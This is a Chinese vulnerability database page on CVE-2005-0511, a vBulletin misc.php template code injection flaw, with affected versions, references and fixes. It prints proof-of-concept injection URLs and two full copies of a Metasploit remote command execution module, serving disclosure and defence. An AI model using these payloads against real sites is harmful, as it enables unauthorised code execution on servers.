CVE-2005-0511
CVSS7.5
发布时间 :2005-02-21 00:00:00
修订时间 :2016-10-17 23:12:16
NMCOEPS    

[原文]misc.php for vBulletin 3.0.6 and earlier, when "Add Template Name in HTML Comments" is enabled, allows remote attackers to execute arbitrary PHP code via nested variables in the template parameter.


[CNNVD]vBulletin misc.php template名远程代码注入漏洞(CNNVD-200502-077)

        vBulletin是一款开放源代码PHP论坛程序。
        vBulletin对用户提交的template名输入缺少充分过滤,远程攻击者可以利用这个漏洞进行代码注入攻击,以Web进程的权限执行任意命令。
        在当Add Template Name in HTML Comments功能开启的时候,用户可以提交恶意代码给template变量值,从而执行任意代码或获得敏感信息。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:jelsoft:vbulletin:2.0_beta_2
cpe:/a:jelsoft:vbulletin:2.0_beta_3
cpe:/a:jelsoft:vbulletin:2.2.8
cpe:/a:jelsoft:vbulletin:3.0.0_rc4
cpe:/a:jelsoft:vbulletin:3.0_beta_2
cpe:/a:jelsoft:vbulletin:3.0.0_can4
cpe:/a:jelsoft:vbulletin:2.0
cpe:/a:jelsoft:vbulletin:2.2.9_can
cpe:/a:jelsoft:vbulletin:2.2.5
cpe:/a:jelsoft:vbulletin:2.3.4
cpe:/a:jelsoft:vbulletin:2.2.4
cpe:/a:jelsoft:vbulletin:2.3.3
cpe:/a:jelsoft:vbulletin:3.0.0
cpe:/a:jelsoft:vbulletin:2.2.3
cpe:/a:jelsoft:vbulletin:2.2.2
cpe:/a:jelsoft:vbulletin:2.2.7
cpe:/a:jelsoft:vbulletin:2.2.6
cpe:/a:jelsoft:vbulletin:2.2.1
cpe:/a:jelsoft:vbulletin:2.3.0
cpe:/a:jelsoft:vbulletin:2.0.2
cpe:/a:jelsoft:vbulletin:2.2.0
cpe:/a:jelsoft:vbulletin:3.0.6
cpe:/a:jelsoft:vbulletin:3.0.5
cpe:/a:jelsoft:vbulletin:2.0.1
cpe:/a:jelsoft:vbulletin:3.0.0_beta_2
cpe:/a:jelsoft:vbulletin:3.0.4
cpe:/a:jelsoft:vbulletin:3.0.3
cpe:/a:jelsoft:vbulletin:3.0.2
cpe:/a:jelsoft:vbulletin:3.0.1

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0511
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0511
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200502-077
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=110910899415763&w=2
(UNKNOWN)  BUGTRAQ  20050222 [SCAN Associates Security Advisory] vbulletin 3.0.6 and below php code injection
http://www.securityfocus.com/bid/12622
(UNKNOWN)  BID  12622
http://www.vbulletin.com/forum/showthread.php?postid=819562
(UNKNOWN)  CONFIRM  http://www.vbulletin.com/forum/showthread.php?postid=819562

- 漏洞信息

vBulletin misc.php template名远程代码注入漏洞
高危 输入验证
2005-02-21 00:00:00 2006-09-28 00:00:00
远程  
        vBulletin是一款开放源代码PHP论坛程序。
        vBulletin对用户提交的template名输入缺少充分过滤,远程攻击者可以利用这个漏洞进行代码注入攻击,以Web进程的权限执行任意命令。
        在当Add Template Name in HTML Comments功能开启的时候,用户可以提交恶意代码给template变量值,从而执行任意代码或获得敏感信息。

- 公告与补丁

        目前厂商还没有提供补丁或者升级程序,建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        http://www.vbulletin.com/

- 漏洞信息 (832)

vBulletin <= 3.0.6 php Code Injection (EDBID:832)
php webapps
2005-02-22 Verified
0 pokley
N/A [点击下载]
# Tested on vBulletin Version 3.0.1 /str0ke 
# http://www.xxx.net/misc.php?do=page&template={${system(id)}} 
#

# [SCAN Associates Security Advisory]
# http://www.scan-associates.net

Proof of concept
================
http://site.com/misc.php?do=page&template={${phpinfo()}}

# milw0rm.com [2005-02-22]
		

- 漏洞信息 (16896)

vBulletin misc.php Template Name Arbitrary Code Execution (EDBID:16896)
php webapps
2010-07-25 Verified
0 metasploit
N/A [点击下载]
##
# $Id: php_vbulletin_template.rb 9929 2010-07-25 21:37:54Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::HttpClient

	# XXX This module needs an overhaul
	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'vBulletin misc.php Template Name Arbitrary Code Execution',
			'Description'    => %q{
					This module exploits an arbitrary PHP code execution flaw in
				the vBulletin web forum software. This vulnerability is only
				present when the "Add Template Name in HTML Comments" option
				is enabled. All versions of vBulletin prior to 3.0.7 are
				affected.
			},
			'Author'         =>
				[
					'str0ke <str0ke[at]milw0rm.com>',
					'cazz'
				],
			'License'        => BSD_LICENSE,
			'Version'        => '$Revision: 9929 $',
			'References'     =>
				[
					[ 'CVE', '2005-0511' ],
					[ 'BID', '12622' ],
					[ 'OSVDB', '14047' ],
				],
			'Privileged'     => false,
			'Platform'       => ['unix', 'solaris'],
			'Payload'        =>
				{
					'Space'       => 512,
					'DisableNops' => true,
					'Keys'        => ['cmd', 'cmd_bash'],
				},
			'Targets'        => [ ['Automatic', { }], ],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Feb 25 2005'
			))

		register_options(
			[
				OptString.new('PATH', [ true,  "Path to misc.php", '/forum/misc.php']),
			], self.class)

		deregister_options(
			'HTTP::junk_slashes' # For some reason junk_slashes doesn't always work, so turn that off for now.
		)
	end

	def go(command)
		wrapper = rand_text_alphanumeric(rand(128)+32)

		command = "echo #{wrapper};#{command};echo #{wrapper};"
		encoded = command.unpack("C*").collect{|x| "chr(#{x})"}.join('.')

		res = send_request_cgi({
				'uri'      => datastore['PATH'],
				'method'   => 'GET',
				'vars_get' =>
					{
						'do' => "page",
						'template' => "{${passthru(#{encoded})}}"
					}
			}, 5)

		if (res and res.body)
			b = /#{wrapper}[\s\r\n]*(.*)[\s\r\n]*#{wrapper}/sm.match(res.body)
			if b
				return b.captures[0]
			elsif datastore['HTTP::chunked'] == true
				b = /chunked Transfer-Encoding forbidden/.match(res.body)
				if b
					raise RuntimeError, 'Target PHP installation does not support chunked encoding.  Support for chunked encoded requests was added to PHP on 12/15/2005, try disabling HTTP::chunked and trying again.'
				end
			end
		end

		return nil
	end

	def check
		response = go("echo ownable")
		if (!response.nil? and response =~ /ownable/sm)
			return Exploit::CheckCode::Vulnerable
		end
		return Exploit::CheckCode::Safe
	end

	def exploit
		response = go(payload.encoded)
		if response == nil
			print_error('exploit failed: no response')
		else
			if response.length == 0
				print_status('exploit successful')
			else
				print_status("Command returned #{response}")
			end
			handler
		end
	end
end
		

- 漏洞信息 (F82364)

vBulletin misc.php Template Name Arbitrary Code Execution (PacketStormID:F82364)
2009-10-30 00:00:00
str0ke  
exploit,web,arbitrary,php,code execution
CVE-2005-0511
[点击下载]

This Metasploit module exploits an arbitrary PHP code execution flaw in the vBulletin web forum software. This vulnerability is only present when the "Add Template Name in HTML Comments" option is enabled. All versions of vBulletin prior to 3.0.7 are affected.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::HttpClient

	# XXX This module needs an overhaul
	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'vBulletin misc.php Template Name Arbitrary Code Execution',
			'Description'    => %q{
				This module exploits an arbitrary PHP code execution flaw in
				the vBulletin web forum software. This vulnerability is only
				present when the "Add Template Name in HTML Comments" option
				is enabled. All versions of vBulletin prior to 3.0.7 are
				affected.
			},
			'Author'         => [ 'str0ke <str0ke[at]milw0rm.com>', 'cazz' ],
			'License'        => BSD_LICENSE,
			'Version'        => '$Revision$',
			'References'     => [
				[ 'CVE', '2005-0511'],
				[ 'BID', '12622'],
				[ 'OSVDB', '14047'],
			],
			'Privileged'     => false,
			'Platform'       => ['unix', 'solaris'],
			'Payload'        => {
					'Space' => 512,
					'DisableNops' => true,
					'Keys'  => ['cmd', 'cmd_bash'],
				},
			'Targets'        => [ ['Automatic', { }], ],
			'DefaultTarget' => 0,
			'DisclosureDate' => 'Feb 25 2005'
			))


		register_options(
			[
				OptString.new('PATH', [ true,  "Path to misc.php", '/forum/misc.php']),
			], self.class
			)
	
		deregister_options(
			'HTTP::junk_slashes' # For some reason junk_slashes doesn't always work, so turn that off for now. 
		)
	end

	def go(command)
		wrapper = rand_text_alphanumeric(rand(128)+32)

		command = "echo #{wrapper};#{command};echo #{wrapper};"
		encoded = command.unpack("C*").collect{|x| "chr(#{x})"}.join('.')

		res = send_request_cgi({
			'uri'      => datastore['PATH'],
			'method'   => 'GET',
			'vars_get' =>
			{
				'do' => "page",
				'template' => "{${passthru(#{encoded})}}"
			}
		}, 5)

		if (res and res.body)
			b = /#{wrapper}[\s\r\n]*(.*)[\s\r\n]*#{wrapper}/sm.match(res.body)
			if b
				return b.captures[0]
			elsif datastore['HTTP::chunked'] == true
				b = /chunked Transfer-Encoding forbidden/.match(res.body)
				if b
					raise RuntimeError, 'Target PHP installation does not support chunked encoding.  Support for chunked encoded requests was added to PHP on 12/15/2005, try disabling HTTP::chunked and trying again.'
				end
			end
		end

		return nil
	end
	
	def check
		response = go("echo ownable")
		if (!response.nil? and response =~ /ownable/sm)
			return Exploit::CheckCode::Vulnerable
		end
		return Exploit::CheckCode::Safe
	end

	def exploit
		response = go(payload.encoded)
		if response == nil
			print_status('exploit failed')
		else
			if response.length == 0
				print_status('exploit successful')
			else 
				print_status("Command returned #{response}")
			end
			handler
		end
	end
end

    

- 漏洞信息

14047
vBulletin misc.php template Parameter PHP Code Injection
Remote / Network Access Input Manipulation
Loss of Confidentiality, Loss of Integrity
Exploit Public Vendor Verified

- 漏洞描述

vBulletin contains a flaw that may allow a malicious user to inject and execute arbitrary PHP code, because nested input passed to the "template" parameter in "misc.php" isn't properly verified and can be exploited. The issue is triggered when the "Add Template Name in HTML Comments" option is enabled. It is possible that the flaw may allow the injection and execution of arbitrary PHP code resulting in a loss of confidentiality and integrity.

- 时间线

2005-02-22 2005-02-17
2005-02-22 Unknow

- 解决方案

Upgrade to version 3.0.7 or higher, as it has been reported to fix this vulnerability. It is also possible to correct the flaw by implementing the following workaround: Disable the "Add Template Name in HTML Comments" option

- 相关参考

- 漏洞作者

- 漏洞信息

VBulletin Misc.PHP Arbitrary PHP Script Code Execution Vulnerability
Input Validation Error 12622
Yes No
2005-02-22 12:00:00 2009-07-12 10:56:00
Discovery of this vulnerability is credited to pokley <pokleyzz@scan-associates.net>.

- 受影响的程序版本

VBulletin VBulletin 3.0.6
VBulletin VBulletin 3.0.5
VBulletin VBulletin 3.0.4
VBulletin VBulletin 3.0.3
VBulletin VBulletin 3.0.2
VBulletin VBulletin 3.0.1
VBulletin VBulletin 3.0 Gamma
VBulletin VBulletin 3.0 beta 7
VBulletin VBulletin 3.0 beta 6
VBulletin VBulletin 3.0 beta 5
VBulletin VBulletin 3.0 beta 4
VBulletin VBulletin 3.0 beta 3
VBulletin VBulletin 3.0 beta 2
VBulletin VBulletin 3.0
VBulletin VBulletin 2.3.4
VBulletin VBulletin 2.3.3
VBulletin VBulletin 2.3.2
VBulletin VBulletin 2.3 .0
VBulletin VBulletin 2.2.9
VBulletin VBulletin 2.2.8
VBulletin VBulletin 2.2.7
VBulletin VBulletin 2.2.6
VBulletin VBulletin 2.2.5
VBulletin VBulletin 2.2.4
VBulletin VBulletin 2.2.3
VBulletin VBulletin 2.2.2
VBulletin VBulletin 2.2.1
VBulletin VBulletin 2.2 .0
VBulletin VBulletin 2.0.3
VBulletin VBulletin 2.0 rc 3
VBulletin VBulletin 2.0 rc 2
VBulletin VBulletin 1.0.1 lite
VBulletin VBulletin 3.0.7

- 不受影响的程序版本

VBulletin VBulletin 3.0.7

- 漏洞讨论

vBulletin is reported prone to an arbitrary PHP script code execution vulnerability. The issue is reported to exist due to a lack of sufficient input sanitization performed on user-supplied data before this data is included in a dynamically generated script.

This vulnerability is reported to affect vBulletin board versions up to and including 3.0.6 that are configured with 'Add Template Name in HTML Comments' functionality enabled.

- 漏洞利用

The following example is available:

http://www.example.com/misc.php?do=page&amp;template={${phpinfo()}}

An exploit (php_vbulletin_template.pm) for the Metasploit Framework is available.

- 解决方案

The vendor has released vBulletin version 3.0.7 to address this issue:


VBulletin VBulletin 1.0.1 lite

VBulletin VBulletin 2.0 rc 2

VBulletin VBulletin 2.0 rc 3

VBulletin VBulletin 2.0.3

VBulletin VBulletin 2.2 .0

VBulletin VBulletin 2.2.1

VBulletin VBulletin 2.2.2

VBulletin VBulletin 2.2.3

VBulletin VBulletin 2.2.4

VBulletin VBulletin 2.2.5

VBulletin VBulletin 2.2.6

VBulletin VBulletin 2.2.7

VBulletin VBulletin 2.2.8

VBulletin VBulletin 2.2.9

VBulletin VBulletin 2.3 .0

VBulletin VBulletin 2.3.2

VBulletin VBulletin 2.3.3

VBulletin VBulletin 2.3.4

VBulletin VBulletin 3.0 beta 4

VBulletin VBulletin 3.0 beta 2

VBulletin VBulletin 3.0 beta 6

VBulletin VBulletin 3.0 beta 7

VBulletin VBulletin 3.0 Gamma

VBulletin VBulletin 3.0 beta 3

VBulletin VBulletin 3.0 beta 5

VBulletin VBulletin 3.0

VBulletin VBulletin 3.0.1

VBulletin VBulletin 3.0.2

VBulletin VBulletin 3.0.3

VBulletin VBulletin 3.0.4

VBulletin VBulletin 3.0.5

VBulletin VBulletin 3.0.6

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站